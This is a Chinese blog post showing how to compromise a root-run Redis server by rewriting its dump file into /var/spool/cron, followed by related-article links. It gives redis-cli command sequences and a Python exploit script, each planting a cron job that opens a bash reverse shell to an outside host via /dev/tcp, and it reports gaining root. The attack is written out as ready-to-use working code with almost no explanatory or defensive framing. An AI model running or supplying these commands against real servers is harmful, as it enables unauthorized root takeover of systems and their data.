前提:

1.redis由root用户启动。

2.开启cron的时候,/var/spool/cron linux机器下默认的计划任务,linux会定时去执行里面的任务。

启动服务 :/sbin/service crond start 或 /etc/init.d/crond start(centos系列)    sudo /etc/init.d/cron start (ubuntu系列)

一.windows下

config set dir /var/spool/cron
config set dbfilename root
set 1 "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/10.1.1.1/1234 0>&1\n\n"
save

二.linux下

echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/10.1.1.1/1234 0>&1\n\n"|redis-cli -h 192.168.118.129 -x set 1
redis-cli -h 192.168.118.129 config set dir /var/spool/cron/
redis-cli -h 192.168.118.129 config set dbfilename root
redis-cli -h 192.168.118.129 save

三.再贴一段python代码

import redis

def shell_exploit():

    try:

        r =redis.StrictRedis(host='192.168.118.129',port=6379,db=0,socket_timeout=10)

        r.set(1, '\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/your_ip/3333 0>&1\n\n')

        r.config_set('dir','/var/spool/cron')

        r.config_set('dbfilename','root')

        r.save()

        print "success!"

    except:

        print "fail!"

        pass

shell_exploit()

反弹成功,root权限!

aaarticlea/png;base64,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" alt="" />

redis写定时任务获取root权限的更多相关文章

  1. Redis未授权访问写Webshell和公私钥认证获取root权限

    0x01 什么是Redis未授权访问漏洞 Redis 默认情况下,会绑定在 0.0.0.0:,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服 ...

  2. Debian普通用户获取root权限|sudo的安装与配置

    Debian系统的普通用户需要安装软件时,往往会收到“Permission denied”的提示,这时候需要root权限.那么如何在不登陆超级管理员账户的前提下拥有root权限呢?对于大多数Linux ...

  3. android中获取root权限的方法以及原理(转)

    一. 概述 本文介绍了android中获取root权限的方法以及原理,让大家对android 玩家中常说的“越狱”有一个更深层次的认识. 二. Root 的介绍 1. Root 的目的 可以让我们拥有 ...

  4. Linaro系统获取root权限方法

    在Zedboard上根据教程安装Linaro Ubuntu后出现一只无法获取Root权限,导致无法挂载U盘等问题. 具体体现在sudo -s命令之后,出现如sudo:must be setuid ro ...

  5. 一则利用内核漏洞获取root权限的案例【转】

    转自:https://blog.csdn.net/u014089131/article/details/73933649 目录(?)[-] 漏洞描述 漏洞的影响范围 漏洞曝光时间 漏洞产生的原因 漏洞 ...

  6. Android 上SuperUser获取ROOT权限原理解析

    Android 上SuperUser获取ROOT权限原理解析 一. 概述 本文介绍了android中获取root权限的方法以及原理,让大家对android 玩家中常说的“越狱”有一个更深层次的认识. ...

  7. 获取root权限及破解原理分析

    2012-03-18 17:58:45|  分类: android |字号 订阅 如今Android系统的root破解基本上成为大家的必备技能!网上也有非常多中一键破解的软件,使root破解越来越ea ...

  8. Linux基本常用命令|ubuntu获取root权限

    我用的是ubuntu12.4系统,因为默认是没有获取root的权限的 下边讲解怎么获取root权限 在终端中输入: sudo passwd root Enter new UNIX password: ...

  9. Android应用请求获取Root权限

    应用获取Root权限的原理:让应用的代码执行目录获取最高权限.在Linux中通过chmod 777 [代码执行目录] /** * 应用程序运行命令获取 Root权限,设备必须已破解(获得ROOT权限) ...

随机推荐

  1. Python面向对象高级编程:__slot__(给实例添加方法、属性)

    纲要: 本章总的来说是给实例添加属性,给类添加方法两个主题,以及相应的作用范围.总结如下: 1.给实例添加属性(作用范围:当然是只对当前实例有效): 2.用__slots__限制可以给实例添加的属性( ...

  2. todomvc-app

    1.HTML <!doctype html> <html lang="en"> <head> <meta charset="ut ...

  3. ZK Leader选举

    1.Zookeeper节点状态LOOKING:寻找Leader状态,处于该状态需要进入选举流程LEADING:领导者状态,处于该状态的节点说明是角色已经是LeaderFOLLOWING:跟随者状态,表 ...

  4. 【uoj#37/bzoj3812】[清华集训2014]主旋律 状压dp+容斥原理

    题目描述 求一张有向图的强连通生成子图的数目对 $10^9+7$ 取模的结果. 题解 状压dp+容斥原理 设 $f[i]$ 表示点集 $i$ 强连通生成子图的数目,容易想到使用总方案数 $2^{sum ...

  5. nginx通过配置empty_gif解决请求favicon 404的问题

    背景介绍 因为一些浏览器在访问网站时会默认去请求网站的favicon,但是我的网站(Tengine)上并没有这些icon图片,因此在访问日志里会出现大量的404错误,会触发一些没必要日志告警.我们可以 ...

  6. zabbix自定义监控阿里云RDS服务

    zabbix自定义监控rds zabbix通过阿里云api 自动发现.监控阿里云RDS-Mysql数据库 注意事项  脚本会收集RDS别名,  不要默认别名 不要使用中文别名(zabbix不识别)  ...

  7. ctex2.9.2输出中文

    安装了ctex2.9.2,打开WinEdt7.0 准备编译论文, 但是中文的地方都是空白,不显示, 到网上找了N个方法,就是引入CJK包,然后加入一下CJK命令来控制中文显示, 结果搞得乱七八糟,还是 ...

  8. 概率图模型(PGM)综述-by MIT 林达华博士

    声明:本文转载自http://www.sigvc.org/bbs/thread-728-1-1.html,个人感觉是很好的PGM理论综述,高屋建瓴的总结了PGM的主要分支和发展趋势,特收藏于此. “概 ...

  9. BZOJ5291 BJOI2018链上二次求和(线段树)

    用线段树对每种长度的区间维护权值和. 考虑区间[l,r]+1对长度为k的区间的贡献,显然其为Σk-max(0,k-i)-max(0,k-(n-i+1)) (i=l~r). 大力展开讨论.首先变成Σk- ...

  10. Luogu4885 灭顶之灾

    显然1的位置确定了整个矩阵,每一段连续的数即是对该位置的限制.化一下式子可以发现是一段区间或一段区间的补集,最后要求的是他们的交.看起来不太好求,于是转为求补集的并,那么排个序就完了. #includ ...